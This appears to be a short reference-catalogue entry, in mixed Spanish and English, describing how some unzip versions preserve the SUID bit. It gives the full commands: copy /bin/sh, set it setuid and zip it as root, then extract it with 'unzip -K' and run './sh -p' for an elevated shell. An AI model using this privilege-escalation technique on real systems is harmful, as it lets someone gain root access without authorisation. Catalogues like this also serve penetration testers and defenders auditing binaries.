Nota
Certain `unzip` versions allows to preserve the SUID bit. For example, prepare an archive beforehand with the following commands as root:
```
cp /bin/sh .
chmod +s sh
zip shell.zip sh
```
./unzip --examples
Funciones y ejemplos de uso
privilege-escalation
unzip -K shell.zip
./sh -p
./related --binary=unzip
Binarios relacionados
Comparten al menos una función con unzip.